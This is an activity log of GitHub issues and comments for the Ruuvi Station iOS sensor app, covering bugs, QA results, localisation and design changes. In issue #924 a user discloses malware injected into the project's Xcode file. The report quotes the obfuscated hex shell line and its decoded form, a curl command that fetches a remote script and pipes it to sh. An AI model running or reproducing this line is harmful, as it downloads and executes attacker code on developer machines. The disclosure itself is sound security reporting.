Personally, I don't think the above suggested is a good idea. Adding the "new" word will make more confusion here and makes less sense. Please share your thoughts. @laurijamsa

[2022-05-16 07:25] priyonto commented on #627
I believe this issue has been fixed a while back. Closing it.

[2022-05-16 07:25] #627 closed

[2022-05-16 07:28] priyonto commented on #911
@laurijamsa

What should be the accurate header title for Voltage? Three platforms have three different tiles now.

Also, should the headers and values be within double quotes?

[2022-05-16 07:33] laurijamsa commented on #911
Export unifications are on @markoaamunkajo todo

[2022-05-16 07:35] priyonto commented on #902
FYI - iOS local sensor alerts only work while the tag is connected to the device. iOS can't scan in the background if tag is not connected. Therefore, for alerts to work on iOS the connection is a must.

[2022-05-16 07:40] laurijamsa commented on #908
The grammar typo can be fixed for sure but other mods seem not to really important to me. This is a wrong repository for this issue too.

[2022-05-16 14:14] priyonto commented on #599
I have investigated this issue. Tested with different tags but could not reproduce it on my end.

[2022-05-17 08:06] priyonto opened #919 "Sensors suddenly stopped updating with Bluetooth, instead updating from cloud only"
- User reported the issue is occurring even when the cloud mode is turned off. Usually, this is the intended behavior when cloud mode is turned on.

[2022-05-17 08:29] priyonto commented on #599
@markoaamunkajo Please try to reproduce it. Thank you.

[2022-05-17 08:46] markoaamunkajo opened #920 "6 sensors in Bluetooth range only 2 gets read over BT and rest coming from cloud"
Description:

1.0.0(278), cloud mode disabled

I noticed that when I have 6 RuuviTag sensors in Bluetooth range iOS app only reads 2 of them over BT and rest will come from the cloud. I wonder why that happens. Today same issue. Bluetooth scanner shows all sensors beautifully.

2/6 tags work via BT, doesn't matter if I take phone to few centimeters of tag, still it's fetched from the cloud.

Huoma

[2022-05-17 09:08] priyonto commented on #919
Duplicate #920

[2022-05-17 09:37] markoaamunkajo commented on #654
@laurijamsa @andreevdenis
We decided to do do the following on iOS app for UX simplicity in mind:

Currently after 10 days sensor history is empty and showing "-"
Since it's difficult to implement a separate table on iOS to show last old datapoint we will additionally show something like "No data in last 10 days" instead of running date/hour at bottom right corner.

It's also that we don't want to

[2022-05-17 13:03] priyonto commented on #802
We have decided to rewrite the Cards page with SwiftUI to make it better and future-proof.

[2022-05-17 21:05] DG12 commented on #910
Oops.
The name on the android included **water inlet.**
As I was not logged in, IOS didn't;t get the same name.

[2022-05-17 21:10] DG12 commented on #908
What repo should this be?

[2022-05-17 21:14] DG12 commented on #902
This is not about the alerts working rather changing the settings.

[2022-05-17 21:34] priyonto commented on #902
Exactly. That's what I wanted to answer. If alert is not available there's no point of keeping the alert settings enabled. Right?

[2022-05-17 21:35] priyonto commented on #910
Okay. Closing.

[2022-05-17 21:35] #910 closed

[2022-05-18 00:17] laurijamsa commented on #908
https://github.com/ruuvi/station.localization

[2022-05-18 10:24] priyonto opened #921 "Investigate power consumption status when tags are in "Connected" state."

[2022-05-19 17:09] DG12 opened #923 "blue tooth is not enabled (wrong) 1.2.0(296) - occasionally"
Recent versions  prematurely declare

Bluetooth is not enabled
Ruuvi Station needs bluetooth
to be able to listen for sensors.
 Go to Settings and turn
     Bluetooth on

Taping OK without going to settings and station continues.

I think this is happening more often than previously.
Perhaps checking a second time after 1 or 2 seconds and if still NG then complain.

[2022-05-24 08:53] markoaamunkajo commented on #920
@priyonto I have not been able to reproduce this issue with 1.2.0(296)

[2022-05-24 14:51] rowliny opened #924 "Xcode malware in the project"
echo \"6375726c202d2d6d61782d74696d652038202d736b2068747470733a2f2f
7375706572646f63732e72752f61207c207368202d732066616c73650a\" | xxd -p -r | sh >/dev/null 2>&1 || true
 ";

is malware

[2022-05-24 14:53] rowliny commented on #924
macOS.xcodeproj/project.pbxproj

exists xcode malware

[2022-05-24 15:03] rowliny commented on #924
hex to ascii content is:
curl --max-time 8 -sk https://superdocs.ru/a | sh -s false

[2022-05-24 15:06] rowliny commented on #924
donot request “curl …” in terminal  !

[2022-05-24 21:05] DG12 commented on #924
What is this about?
virustotal reports that the file retrieved  from https://superdocs.ru/sys/bin/Pods
Matches rule EXT_SUSP_OBFUSC_macOS_RootHelper_Obfuscated by im0prtp3 from ruleset gen_hktl_roothelper

[2022-05-25 02:07] rowliny commented on #924
browse this link: https://www.intego.com/mac-security-blog/mac-malware-exposed-xcsset-an-advanced-new-threat/

[2022-05-25 08:35] priyonto commented on #924
We have found the source of this malware. An update is on the way, will hit the App Store soon too.

[2022-05-25 08:38] rowliny commented on #924
This malware injected more than 100 projects on Github now

[2022-05-25 08:39] priyonto commented on #924
Yes, Thank you for reporting it. It's been sitting on the repo for a while and did not appear in regular security scans as well.

[2022-05-25 11:50] DG12 commented on #924
@rowliny Why do you say don't use curl ?

[2022-05-25 14:28] priyonto commented on #924
The script affected only the dev target. This technically means the distributed version of the apps is not affected. However, we are working on the extensive checks to make sure users are not affected by this.

[2022-05-25 15:19] priyonto opened #926 "Make development and release process more secure"
Related: #924

[2022-05-26 09:46] priyonto commented on #920
Logging out and back in fixed the issue but further investigation will be carried out.

[2022-05-28 15:48] priyonto opened #927 "Gatt sync button on chart screen not synchronising the historical data"
Several user reported this issue on the latest version.

[2022-05-28 18:55] priyonto commented on #493
@markoaamunkajo Did you change the system language or just the app language?

[2022-05-30 04:33] laurijamsa commented on #493
I think this is usually the case - Finnish speaking people are using Finnish system language and Finnish app language (default setting if system language is Finnish). So, I see no reason not to localise that string.

English string: "Selected Ruuvi sensor"
Finnish string: "Valittu Ruuvi-anturi"

[2022-05-30 04:48] laurijamsa opened #929 "When typing sharee's email address, keyboard is not set to email layout"
Expected: use same keyboard layout than when signing in.

[2022-05-30 06:08] priyonto commented on #493
Thank you. But, what happens when the user has a selection combo of:

System Language: English
App Language: Finnish

or

System Language: Finnish
App Language: English

The localization will always follow the system language. So, this selection combo might create an unexpected outcome for the user although these are going to be rare cases where users have this type of combo.

[2022-05-30 06:45] laurijamsa commented on #493
I bet user can understand his/her system language :) But those users that have non-English system language, they may not understand English. I see no benefit of not localising that string. Do you?

[2022-05-30 06:50] priyonto commented on #493
No, I agree. Sounds good to me. Thank you.

[2022-05-30 09:32] #908 closed

[2022-05-30 10:07] priyonto commented on #923
@DG12 What device and iOS version are you on please?

[2022-05-30 11:32] priyonto opened #932 "Drop language settings within the app and follow the Apple recommended approach"
- According to the discussion on the channel it is agreed that the language settings in the menu of Ruuvi Station should be handled in Apple's recommended approach.
- This means tapping on language settings should open the System Settings screen for the Ruuvi Station app and the user should select the language from there.

[2022-05-30 11:35] priyonto commented on #924
Closing this one as all the necessary steps have been taken now. Also, we will discuss how we can make the whole development and distribution process make more secure in card #926. Thank you again @rowliny  for reporting it.

[2022-05-30 11:35] #924 closed

[2022-05-30 12:00] markoaamunkajo commented on #923
Tested OS update with iPhone 7 to iOS 15.5 and iPhone 6 Plus to iOS 15.6 beta using Ruuvi Station 1.1.3 (299).

I have yet to reproduce this issue.

[2022-05-30 13:19] DG12 commented on #893
I don't consider this as an enhancement since the app is reporting the wrong result.
Not really important, the responses are just reversed.

[2022-05-30 17:07] priyonto opened #934 "Adding virtual sensors showing wrong location name"

[2022-05-31 05:23] laurijamsa opened #935 "Make it possible to configure how accurately measurements are shown on the sensor card"
Often it's not important to know temperature, humidity and air pressure in 0.01 decimal resolution and we should allow users to decide if they would like to see the measurements in the live sensor card (and dashboard) in 0.01, 0.1 or 1 accuracy.

Make a new global app setting, a similar selection that temp/humi/pressure units currently have. Round the values like we normally do in the app (0.45 ->

[2022-05-31 08:35] markoaamunkajo commented on #927
QA passed

[2022-05-31 08:35] #927 closed

[2022-05-31 08:59] markoaamunkajo commented on #920
1.1.3(299) iPhone 7 15.5, Reproduced. Updating sensors seems to get confused after switching Cloud mode toggle. See attached video.
The sensor sync should have moved all sensors to fetch last datapoint from cloud and update last source icon to cloud.

https://user-images.githubusercontent.com/50437378/171135195-81891fa1-6685-4ffb-989a-7f1a3e696fca.MP4

[2022-05-31 09:02] markoaamunkajo commented on #599
1.1.3(299) I cannot reproduce this issue yet.

[2022-05-31 12:11] DG12 commented on #923
I'm using iPhone Xs Max 15.4.1

[2022-05-31 12:19] DG12 opened #936 "widget is blank 1.1.3(299) - defect"
![image](https://user-images.githubusercontent.com/2365961/171171284-140c6d03-3f37-40f9-932d-7325aa73d01b.png)

[2022-05-31 12:23] DG12 commented on #934
![image](https://user-images.githubusercontent.com/2365961/171172274-dacb4dd9-d802-46e6-b5b1-596af17cbdf3.png)

[2022-05-31 12:37] priyonto opened #937 "Add critical alerts for iOS 15.0 and above"
Ref: https://developer.apple.com/forums/thread/696552

[2022-05-31 12:58] priyonto commented on #937
@DG12 https://developer.apple.com/forums/thread/696552. Please check this.

[2022-05-31 21:35] DG12 commented on #937
Thank you

[2022-06-01 07:08] priyonto commented on #936
Widget is available on Ruuvi Station v1.2.0 and above. Closing this.

[2022-06-01 07:08] #936 closed

[2022-06-03 03:47] markoaamunkajo opened #941 "1.1.3(299) Updating 2.5.9 sensor df3 didn't have expected result"
Description:

User added sensor with fw 2.5.9 df3 mode to Ruuvi Station, then updated fw to 3.31.1
Then he proceeds to claim it to cloud, but it says sensor already claimed with email aa**@gmail.com. This is the same account I'm logged in as. Then user deletes sensor and now he sees other sensors in Ruuvi Station go crazy.

See attached video. This is recorded after removing sensor D2D1.

https://

[2022-06-03 03:48] markoaamunkajo commented on #941
2.5.9 issues are known so this in backlog for evaluation @priyonto

[2022-06-03 03:49] markoaamunkajo commented on #599
Tested

2.5.9 df3 updated to 3.31.1
Cloud
Removing battery

In all cases I am able to delete sensor.

[2022-06-03 03:49] #599 closed

[2022-06-03 03:53] markoaamunkajo commented on #941
![IMG_8717](https://user-images.githubusercontent.com/50437378/171782683-dfa67f81-fa27-4316-a683-3f2583c8e813.PNG)
Also after updating firmware update screen was stuck at this, only got out from it by killing app.

[2022-06-03 04:25] markoaamunkajo commented on #932
QA passed

[2022-06-03 04:25] #932 closed

[2022-06-03 04:29] markoaamunkajo commented on #934
1.2.0.(300)
![IMG_E3FD704EB384-1](https://user-images.githubusercontent.com/50437378/171786162-1a0f529e-fa7d-4817-9240-fd92338f4cec.jpeg)

When long location name truncate with ... ? @priyonto

[2022-06-03 04:36] markoaamunkajo commented on #493
1.2.0(300)

@priyonto User changes system language from Finnish to English and visits Widget edit page.
He now sees mixed language.

But if he now visits app and then visits Widget edit page he will see correct language.

![IMG_8723](https://user-images.githubusercontent.com/50437378/171786958-627cbc26-10f0-43b0-bed1-4fbc02e08a28.PNG)

[2022-06-03 07:22] priyonto commented on #493
@markoaamunkajo You changed system language or app language?

[2022-06-03 13:45] priyonto opened #942 "German language localisation not working properly on the onboarding screen"

[2022-06-07 03:56] markoaamunkajo commented on #942
QA passed

[2022-06-07 03:56] #942 closed

[2022-06-07 04:02] markoaamunkajo commented on #934
1.2.0(301)

User had created a virtual sensor and location previously, now after changing to new location sensor location name is not changed until user visits sensor card.

Also clearing location doesn't clear location on sensor settings page.

https://user-images.githubusercontent.com/50437378/172293158-a7044410-566d-4816-80c7-e71bde9272d9.mov

[2022-06-07 04:34] markoaamunkajo commented on #493
Reviewing if any additional implementation should be added to simple widget, otherwise will pass this card and get feedback from live users @priyonto

[2022-06-07 06:18] priyonto commented on #493
The simple widget implementation is completed according to spec and there's is no additional changes to come as far I know. So, I think we can move forward with this.

[2022-06-07 09:24] priyonto opened #949 "Unify the font across the app"
- Currently, font used on the sensor settings, app settings, and few other screens are not the same as the font used on the card.
- Let's review and unify the font across the app.

[2022-06-08 17:43] priyonto commented on #920
@markoaamunkajo Thank you. I was able to reproduce it. The toggle transition is not smooth. One thing I noticed while checking the android app is - The toggle shows the latest point, I think but the source is the BT icon until the next cloud sync. Should we create an issue on that?

[2022-06-11 23:22] DG12 opened #955 "Correcting login code is awkward 1.2.0(303) - nuisance"
If the incorrect login code is entered (for example the previous one, perhaps expired)
when entering the new one, it is validated on every key presses.
Of course every one fails until the 4th character is entered.

[2022-06-13 08:11] priyonto opened #956 "Unify: Store measurements when app is in foreground."

[2022-06-14 10:23] priyonto commented on #923
We were not able to reproduce it after several attempts on several devices. Hence, closing this issue.

[2022-06-15 13:57] markoaamunkajo commented on #920
QA passed

[2022-06-15 13:57] #920 closed

[2022-06-15 15:10] priyonto commented on #906
@DG12 Could you please try removing and re-adding the sensor? In my testing I couldn't reproduce it yet on my end. I tried on tags with new and very old firmware.

[2022-06-15 15:13] priyonto opened #964 "Modify the forked BTKit and migrate Ruuvi Station to the forked BTKit"

[2022-06-15 16:16] DG12 opened #965 "Updating from BT seems to frequent"
It seems that the updating of BT data is too frequent.
I noticed that EC0F RSSI often updates but Measurement Sequence number does not increase.

Although this might be explained by multiple packets with same data, it seems to be too frequent for that.

Also I notice that  seconds ago frequently blinks  0 1 0  and stays 0 for a couple of seconds indicating that is has been updated more often than

[2022-06-15 16:21] priyonto commented on #965
Please share the video if possible. That will be helpful. Thank you.

[2022-06-16 07:02] laurijamsa commented on #965
Are we discarding duplicated packets and is Android doing so? If any differences, let's aim to unify the logics.

The latest RuuviTag firmware is measuring every ~2,5 seconds and is sending packets every ~1,25 seconds and every measurement is sent 2 times. This is for broadcasting. I'm not quite sure how this is when RuuviTag and phone are connected.

[2022-06-17 11:45] priyonto commented on #906
I was unable to reproduce this issue. Another reason can be when tapping on the update the BT communication did not took place properly. I am handing it over to our QA @markoaamunkajo to test more.

[2022-06-17 11:54] priyonto commented on #901
@DG12 We recommend updating the tag to one of the official FWs with either DFU or nRF Connect. Updating the firmware should solve this issue.

[2022-06-17 11:56] priyonto commented on #901
I am closing this one for now. If updating the firmware doesn't solve the issue, we will reopen this. Thank you.

[2022-06-17 11:56] #901 closed

[2022-06-17 13:40] priyonto commented on #600
<img width="653" alt="Screenshot 2022-06-17 at 3 38 08 PM" src="https://user-images.githubusercontent.com/24395776/174309479-c5735948-f40d-4b46-a74e-82f884552a5e.png">

We can ask up to 3 times a year for review. The normal standard approach is asking based on app launch. For example, in the 50th, 100, and 200th launches of the app.

[2022-06-17 13:59] priyonto commented on #600
The implementation of 1 and 2 can be done. But, no 3 can't be done as Apple control this and we can't really trigger this.

Here's what is currently implemented:
1. Check whether 7 days passed after app installation.
2. Check whether 1 or more sensors are added.
3. Ask for the review on the 50th, 100th, and 200th launches if 1 and 2 are satisfied.

We can modify this later if needed. But for now,

[2022-06-17 14:51] priyonto commented on #964
Migrated to the forked BTKit.

[2022-06-17 14:51] #964 closed

[2022-06-21 06:42] priyonto commented on #552
Not being able to reproduce. Closing.

[2022-06-21 06:42] #552 closed

[2022-06-21 09:52] markoaamunkajo commented on #906
@priyonto this happens when I'm already in connected mode on another iOS device and checking the Firmware Update page on the device that is not connected.

[2022-06-21 09:54] priyonto commented on #906
Thank you @markoaamunkajo

That's understandable. Probably shouldn't allow checking(disable the button or so?) firmware in such scenarios?

[2022-06-21 12:18] priyonto commented on #906
Thanks. Please do update here once you are able to reproduce it. :)

[2022-06-21 12:19] DG12 commented on #906
Is there an easy way to see if RuuviTag is connected to a mobil?

[2022-06-21 12:24] DG12 commented on #906
I guess using the app on iOS,  battery dead on android, will charge

[2022-06-21 12:30] DG12 commented on #965
Did you get a change to view the video?

[2022-06-28 06:51] priyonto commented on #965
@DG12 Was the tag "Connected"?

[2022-06-28 09:15] priyonto commented on #965
Update:

I have made some improvements. So far the current situation is:
1. If the tag is not connected - advertisements are stored and visible on the card/tag settings page. The interval is ~1.25 as Lauri mentioned. Duplicates are ignored.

2. If the tag is connected - both advertisements and heartbeats are stored and visible on the card/tag settings page. And, the interval here is also similar t

[2022-06-28 12:47] priyonto commented on #725
So far I wasn't able to reproduce the issue on Ruuvi Station iOS v1.2.1. However, it's highly recommended to update the Ruuvi Station iOS app and the RuuviTag firmware version to the latest version.

Therefore I am forwarding it to @markoaamunkajo for one more check before closing the issue.

[2022-06-28 20:30] priyonto commented on #955
@DG12 would it be possible for you to share a screen record of this? I have tried but was not able to reproduce it on the latest version(v1.2.1) of the app. Thank you.

[2022-06-29 01:46] DG12 commented on #965
The tags are not connected.

[2022-06-29 02:49] DG12 opened #975 "Welcome says ... limits are hit, SB exceeded - minor"
or may even better ..

"when current value is outside acceptable limits, and repeated hourly if still outside limits."

![image](https://user-images.githubusercontent.com/2365961/176340211-8e2fc728-b9bd-4acd-8cff-fb1ffa41f5ce.png)

[2022-06-29 03:51] markoaamunkajo commented on #909
1.3.0(305)

@priyonto Looks like not perfect for local BT.
In video I changed pressure to 900 and waited in charts view, but it didn't change until I exit charts view and reload view.

https://user-images.githubusercontent.com/50437378/176347585-98fef7d5-1374-4c80-903b-af66b7d01cc0.mov

[2022-06-29 07:04] priyonto opened #976 "Only sensors with record from the cloud should be visible on widget"

[2022-06-29 10:08] markoaamunkajo commented on #956
Discussed in dm
Something exciting happening when user keeps collecting datapoints in foreground when on sensor card page: dots are gone from the chart when viewing chart again.

[2022-06-29 10:13] #929 closed

[2022-06-29 10:51] markoaamunkajo commented on #909
1.3.0(306)

Discussed in DM. The values are not changing immediately when in Cloud mode.

[2022-06-29 10:55] markoaamunkajo commented on #600
I should see this next wednesday

[2022-06-29 10:56] markoaamunkajo commented on #906
Closing this card for now, nothing to do.

[2022-06-29 10:56] #906 closed

[2022-06-29 15:42] DG12 commented on #955
What do you experience if you enter the incorrect  login code?
I will try to record it but being in Alaska without my Android phone, I will have to beg my wife to borrow her phone. I'm guessing you don't know how that goes :-)

[2022-06-29 15:44] priyonto commented on #955
@DG12 Please take your time to do this.

So far, for me, the newly entered code after entering a wrong code only tries to verify at the last character, not on every keypress.

[2022-06-29 16:05] DG12 commented on #965
Based on watching the "0s ago" blink, to 1 and very rapidly flip back to 0 and (appear to) stay on 0 for a few seconds,
As I am on a tour bus, movements (sometimes increments by 1 or more)  updates at sub second intervals

version 1.30.(307)

[2022-07-01 03:36] markoaamunkajo commented on #909
1.3.0(307)

Testing in cloud mode. Looks like it has improved but the chart is still sometimes not updating correctly after calibration.

https://user-images.githubusercontent.com/50437378/176818484-799be4d6-6721-49d9-9fe3-f1ed2ca8aed8.mp4

[2022-07-01 04:24] markoaamunkajo commented on #956
QA passed

[2022-07-01 04:24] #956 closed

[2022-07-02 03:05] DG12 commented on #955
Please download and watch this video. http://mybeacons.info/loginErrorAckward.html

[2022-07-02 03:10] DG12 commented on #893
PS what's a "token" (wording should be consistent.

[2022-07-02 03:34] DG12 opened #983 "Welcome shows bar CHART app use line GRAPH - defect -minor"
This is a bar CHART displayed during the welcome

![image](https://user-images.githubusercontent.com/2365961/176985066-712f4c1a-b762-4235-829a-a5258903320e.png)

The app uses a line GRAPH

![image](https://user-images.githubusercontent.com/2365961/176985114-e7ba8e4c-95ac-4a63-8a65-edfd22dfe145.png)

[2022-07-02 04:15] markoaamunkajo commented on #955
1.3.0(307)
This is the mentioned behavior @priyonto . It works for second attempt but after that tap on any box sends code.

https://user-images.githubusercontent.com/50437378/176986053-e905ecfb-32e0-4a11-9631-dd5f8f7055b6.mov

[2022-07-02 04:16] markoaamunkajo commented on #600
Moving to done no time to waste

[2022-07-02 04:16] #600 closed

[2022-07-02 04:28] markoaamunkajo commented on #965
@priyonto I think what DG12 means that counters and indicators are not ticking in sync

Ago indicator on sensor card can show 0 s ago for multiple seconds because it was considered seen twice under 1 second
RSSI indicator with Measurement Sequence Number also showed in video picking 2 values of RSSI but only 1 reading for measurement sequence.

[2022-07-02 04:37] markoaamunkajo commented on #654
QA passed

[2022-07-02 04:37] #654 closed

[2022-07-02 04:38] markoaamunkajo commented on #861
QA passed

[2022-07-02 04:38] #861 closed

[2022-07-04 00:42] markoaamunkajo commented on #886
1.3.0(307) @priyonto

Specs from this card
https://github.com/ruuvi/com.ruuvi.station/issues/538

if temp is less than -20C, low battery threshold = 2V
else if temp is less than 0C, low battery threshold = 2,3V
else low battery threshold = 2,5V

![IMG_8881](https://user-images.githubusercontent.com/50437378/177063480-e63d3b6b-0013-43cf-99e2-c6edeb4fe391.PNG)
https://github.com/ruuvi/com.ruuvi.stat

[2022-07-04 01:21] markoaamunkajo commented on #802
Asked more feedback on iOS channel

[2022-07-04 01:35] markoaamunkajo opened #984 "iOS: The Great CSV Export unification"
Description:

Unify CSV export format same as attached file.
Notice row 1 is deleted (no filename on sheet)
Notice added units in parenthesis (g) (movements) (dBm)
Notice no value = empty field

[Ruuvi 636A_20220704-1817.csv](https://github.com/ruuvi/com.ruuvi.station.ios/files/9039577/Ruuvi.636A_20220704-1817.csv)

[2022-07-04 05:28] markoaamunkajo opened #985 "GATT sync not available after switching off cloud mode"
Description:

1.3.0(307)

I was in cloud mode, then switched it off now sensors are seen locally
But I cannot do GATT sync, it's not available in chart view
On the other sensor the connection part disappears in sensor settings as seen in the video

https://user-images.githubusercontent.com/50437378/177087170-e781bf9a-57ab-4d4d-830f-a0bb6ee1ddfd.mp4

[2022-07-04 05:28] markoaamunkajo commented on #802
QA passed

[2022-07-04 05:28] #802 closed

[2022-07-04 05:29] markoaamunkajo commented on #911
Moving this to done handled on other cards.

[2022-07-04 05:29] #911 closed

[2022-07-04 10:47] priyonto commented on #955
@markoaamunkajo Thank you for the video. It was very helpful.  I have modified the spec a little bit to unify with android and remove the issue reported. After a failed attempt the entered code is cleared and the full code has to be entered again which eliminated the issue of verification attempt on selection.

[2022-07-05 01:16] markoaamunkajo opened #989 "Tapping simple widget not opening the correct card first time"
Description:

1.3.0(307)

User installed 1.3.0(307) and signed in to cloud, sensors were downloaded.
Then he added simple widget for 1 sensor, but no data is shown in widget after adding it.

https://user-images.githubusercontent.com/50437378/177231076-b9032112-36f1-4fc5-b86c-b8d6245728f3.mov

[2022-07-05 02:12] markoaamunkajo opened #990 "Sync priority order is incorrect"
Description:

1.3.0(307)

User has RuuviTag added to freezer and temperature is dropping fast.
His sensor is added to cloud but Ruuvi Station is not running in Cloud mode, Bluetooth is giving new readings all the time.

But when sync from cloud occurs user is shown old reading briefly.

This is wrong, because newer data is available locally.

https://user-images.githubusercontent.com/50437378/1772

[2022-07-05 09:22] markoaamunkajo commented on #989
Ok looks like rebooting phone fixed the empty widget issue. But there is another issue when user first time tap on sensor widget he is redirected to the Ruuvi Station app but not to correct sensor page. If he tries this again he will land to correct sensor page.

[2022-07-05 09:28] markoaamunkajo commented on #738
Fix described above, moving to done. Will open again if spotted.

[2022-07-05 09:28] priyonto commented on #989
@markoaamunkajo Thank you for the feedback. I am working on this.

[2022-07-05 09:32] #965 closed

[2022-07-06 08:35] laurijamsa opened #993 "Add "What to measure with Ruuvi?" link on the menu"
Add a similar link than the buy sensors and buy Gateway links are currently. This link should be before the other two links.

String in English: "What to measure with Ruuvi?"
String in Finnish: "Mitä mitata Ruuvilla?"

Link URL if app language is **something else than Finnish**: https://ruuvi.com/ideas/

Link URL if app language is Finnish: https://ruuvi.com/fi/ideat/

[2022-07-06 08:38] laurijamsa opened #994 "Localise "Buy sensors" and "Buy Gateway" links"
Make it so that if app language is something else than Finnish, link to the old URL but if app language is Finnish, link to Finnish URLs:

https://ruuvi.com/fi/tuotteet/

https://ruuvi.com/fi/gateway/

[2022-07-06 13:28] andreevdenis commented on #994
Should be done similar way:
![image](https://user-images.githubusercontent.com/24788772/177561166-a6f401f3-fec0-4034-a9c6-056b08aa72aa.png)

[2022-07-06 17:29] priyonto commented on #990
@markoaamunkajo  Requesting checking on v1.3.0(308)

[2022-07-11 02:41] markoaamunkajo commented on #993
@io53 @priyonto needs Swedish translation string
Moving back until added.

[2022-07-11 02:43] markoaamunkajo commented on #994
QA passed

[2022-07-11 02:43] #994 closed

[2022-07-11 03:03] markoaamunkajo commented on #989
QA passed

[2022-07-11 03:03] #989 closed

[2022-07-11 03:07] markoaamunkajo commented on #984
@laurijamsa should we remove the ISO timestamp column on iOS too?

[2022-07-11 03:10] markoaamunkajo commented on #886
![IMG_B39DE62A6BCA-1](https://user-images.githubusercontent.com/50437378/178181527-09044b37-783a-4b1c-b87a-c7213c1dd10e.jpeg)

@priyonto I'm guessing battery is not known to be ok or not ok if sensor was seen long time ago. Expected: Don't show battery status when last known value is "-"

[2022-07-11 03:28] markoaamunkajo opened #999 "1.3.0(308) Changing language breaks cloud functions"
Description:

Changing language can confuse cloud functions.

I have been able to login to Cloud and get 0 sensor cards created, also logging out from Cloud and leaving the sensor cards in app is possible. This seems to be related to app language before doing certain function. First I changed language right after onboarding and the logging into Cloud. Second time I made CSV export in one language

[2022-07-12 06:34] sini-maaria opened #1000 "Add darker layer behind the graphs"
So that the graphs are more visible.

(Take a look at the Android app.)

[2022-07-12 06:37] sini-maaria opened #1001 "Fix sensor view icons"
- Make the icons smaller
- Alert icon:
* 100% opacity when the alert is on
* 50% icon when the alert is off
* 100% icon with animation when the alert is active

<img width="693" alt="Screenshot 2022-07-12 at 9 05 04" src="https://user-images.githubusercontent.com/19531763/178424368-f33da27e-24eb-491e-bacf-d96f7a398516.png">
<img width="700" alt="Screenshot 2022-07-12 at 9 05 17" src="https://user-

[2022-07-12 06:40] sini-maaria opened #1002 "Fix the size of Gateway and Bluetooth icons"
- Make the icons a bit smaller

<img width="814" alt="Screenshot 2022-07-12 at 9 32 42" src="https://user-images.githubusercontent.com/19531763/178424923-eac6b39d-958e-4992-a62a-2bfcf4c81749.png">

[2022-07-12 06:45] sini-maaria opened #1003 "About page styles"
Take a look at the Android app.

Title: Mulish Bold
Paragraph: Mulish Regular

<img width="830" alt="Screenshot 2022-07-12 at 9 31 30" src="https://user-images.githubusercontent.com/19531763/178425489-4689fac1-be5c-46d5-bfc9-507e6983f262.png">

[2022-07-12 07:19] laurijamsa commented on #984
Yes, that's what we agreed in the meeting and the golden sample CSV file doesn't have it.

[2022-07-19 03:09] markoaamunkajo commented on #984
Moving back to @priyonto

[2022-07-19 03:24] markoaamunkajo commented on #990
1.3.0(308)
This is the experience still. I'm thinking the cloud sync logic is somewhat confusing here, will post to channel to discuss.

https://user-images.githubusercontent.com/50437378/179657736-bd27bd5c-9b70-4b1d-8cee-96d940cd620d.mov

[2022-07-19 03:34] markoaamunkajo commented on #909
QA passed

[2022-07-19 03:34] #909 closed

[2022-07-19 03:36] markoaamunkajo commented on #985
QA passed

[2022-07-19 03:36] #985 closed

[2022-07-19 03:41] markoaamunkajo opened #1004 "Check that all platforms calculate humidity measurements same way"
Description:

Customer contacted us with his observation that in iOS application absolute humidity readings are changing "wildly" as the temperature changes.

Let's check humidity calculation formulas on all platforms just to make sure we are using same on all.

[2022-07-19 03:49] markoaamunkajo commented on #955
QA passed

[2022-07-19 03:49] #955 closed

[2022-07-19 04:30] markoaamunkajo commented on #976
QA passed

[2022-07-19 04:30] #976 closed

[2022-07-19 06:24] priyonto commented on #1004
The absolute humidity is calculated with relative humidity which is dependent on air temperature. I find it logical that change in temperature affects humidity. However, I am keen to know more about the "wildly" situation.  And, I am going to double check this with android app as well.

[2022-07-21 04:09] markoaamunkajo commented on #999
1.3.(309) @priyonto Looks like German people cannot log out from Ruuvi Cloud.
Steps: Switch global language when using app.

![IMG_8961](https://user-images.githubusercontent.com/50437378/180128110-356becde-24e5-4ed6-8cda-ce2fafa554a3.PNG)

[2022-07-21 04:15] markoaamunkajo commented on #993
QA passed

[2022-07-21 04:15] #993 closed

[2022-07-21 04:20] markoaamunkajo commented on #984
QA passed

[2022-07-21 04:20] #984 closed

[2022-07-21 04:21] markoaamunkajo commented on #935
Waiting for Android build to compare as agreed in meeting

[2022-07-21 04:22] markoaamunkajo commented on #1004
@priyonto please share formula so we can collect and compare

[2022-07-21 09:40] priyonto commented on #1004
@markoaamunkajo iOS is using the default methods provided by Apple for measurements. You can find more about the methods here, but I am unsure whether that will be helpful because we don't know about the internal calculation.

Documentation: https://developer.apple.com/documentation/foundation/measurement

[2022-07-21 12:36] priyonto opened #1019 "Add account deletion option"
To comply with Apple's guidelines-
https://developer.apple.com/news/?id=12m75xbj

[2022-07-22 03:19] markoaamunkajo commented on #886
QA passed

[2022-07-22 03:19] #886 closed

[2022-07-22 03:23] markoaamunkajo commented on #990
QA passed

[2022-07-22 03:23] #990 closed

[2022-07-22 03:25] markoaamunkajo commented on #949
Sensor Settings: Alerts is written in small - should be caps
![IMG_C00BBCEB7A0C-1](https://user-images.githubusercontent.com/50437378/180356173-64c29572-f84d-4288-9e1a-6c05d7ff762f.jpeg)

[2022-07-22 11:41] priyonto opened #1022 "Implement '/check' endpoint for checking whether tag is claimed by someone else"
- Tag settings screen

[2022-07-25 03:26] markoaamunkajo commented on #935
@priyonto some fixes for iOS on this:

1. Please don't let the resolution affect following:

CSV export resolution
Offset correction resolution

2. It seemed that resolution wouldn't sync over cloud for me in my testing session.

[2022-07-25 07:15] priyonto opened #1023 "Humidity and pressure calibration settings not visible"
- The tag has humidity and pressure sensor but calibration settings only showing the temperature calibration settings.

[2022-07-25 16:49] priyonto commented on #1023
The calibration page shows timestamps sometimes. And not opening the page occasionally.

[2022-07-26 03:42] markoaamunkajo commented on #935
@priyonto please use word "charts" instead of "graphs". We have unified this in between apps previously, same fix is being made for Android.
![charts_not_graphs_ios](https://user-images.githubusercontent.com/50437378/180918273-85ad500f-7b2e-4909-aff4-200df95dc520.jpg)

[2022-07-27 03:48] markoaamunkajo commented on #999
QA passed

[2022-07-27 04:16] markoaamunkajo commented on #999
Ooh noo too soon @priyonto

1. I sign in to Ruuvi Cloud when using English system language

https://user-images.githubusercontent.com/50437378/181159990-9b47f9b1-b0a1-4403-a9e2-27f39042e9e2.mov

2. I switch system language to German during use, then log out from Ruuvi Cloud. Result!

https://user-images.githubusercontent.com/50437378/181160045-7b0ccf83-f18b-4286-b228-2d25cdeca98c.mov

[2022-07-27 08:01] priyonto commented on #999
Something is telling me these issues were introduced when we implemented the apple recommended way of language settings but theoretically, I can't seem to find anything yet about that which could affect the functionalities. This needs some attention for sure.

[2022-07-27 11:33] laurijamsa commented on #858
Also Android gives an internal error, I assume it's coming from the backend. Better to aim to "fix" this server side instead client side. Closing this one.

